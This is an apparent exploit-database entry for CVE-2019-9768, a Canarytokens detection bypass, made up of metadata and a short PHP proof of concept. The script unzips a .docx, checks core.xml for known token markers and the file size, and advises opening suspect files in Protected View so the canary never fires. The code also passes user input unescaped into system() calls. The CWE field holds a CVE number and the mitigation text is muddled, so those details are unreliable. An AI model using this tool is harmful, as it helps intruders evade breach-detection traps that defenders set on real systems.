Canarytokens 2019-03-01 - Detection Bypass

vendor:

Canarytokens

by:

Benjamin Zink Loft, Gionathan Reale

7.5

CVSS

HIGH

Bypass Detection

287

CWE

Product Name: Canarytokens

Affected Version From: 2019-03-01

Affected Version To: 2019-03-01

Patch Exists: YES

Related CWE: 2019-9768

CPE: a:thinkst:canarytokens

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2019

Canarytokens 2019-03-01 – Detection Bypass

This exploit allows attackers to bypass detection of Canarytokens up to 2019-03-01 by unzipping the .docx file and checking the core.xml file for the presence of 'AAAAAAAAAAAAAAAA' and '2015-07-21' strings and filesize less than 170000 bytes.

Mitigation:

Ensure that the core.xml file is not modified and filesize is greater than 170000 bytes.

Source

Exploit-DB raw data:

## Exploit Title: Canarytokens 2019-03-01 - Detection Bypass
# Date: 20.03.2019
# Exploit Author: Benjamin Zink Loft, Gionathan "John" Reale 
# Vendor Homepage: https://thinkst.com/
# Version: up to 2019-03-01
# Software Link: https://github.com/thinkst/canarytokens
# Google Dork: N/A 
# CVE: 2019-9768 
#==================================================================================================================================================================================
# PoC:
#
#
#
# Requires unzip:
#
# sudo apt-get install unzip
#
#


<?php
 
system('unzip ' . $argv[1] . '.docx');
 
system('cp ' . $argv[1] . '.docx ./docProps/' . $argv[1] . '.docx && cd docProps');
 
$strFile = file_get_contents("docProps/core.xml");
 
if(strpos($strFile, 'AAAAAAAAAAAAAAAA')!=false && strpos($strFile, '2015-07-21')!=false && filesize( $argv[1] .".docx") < 170000 )
{
     echo "This file probably contains a CanaryToken! Open it with Libreoffice/Microsoft Word Protected View to bypass detection";
}
else
{
     echo "Should be safe to open normally";
}
?>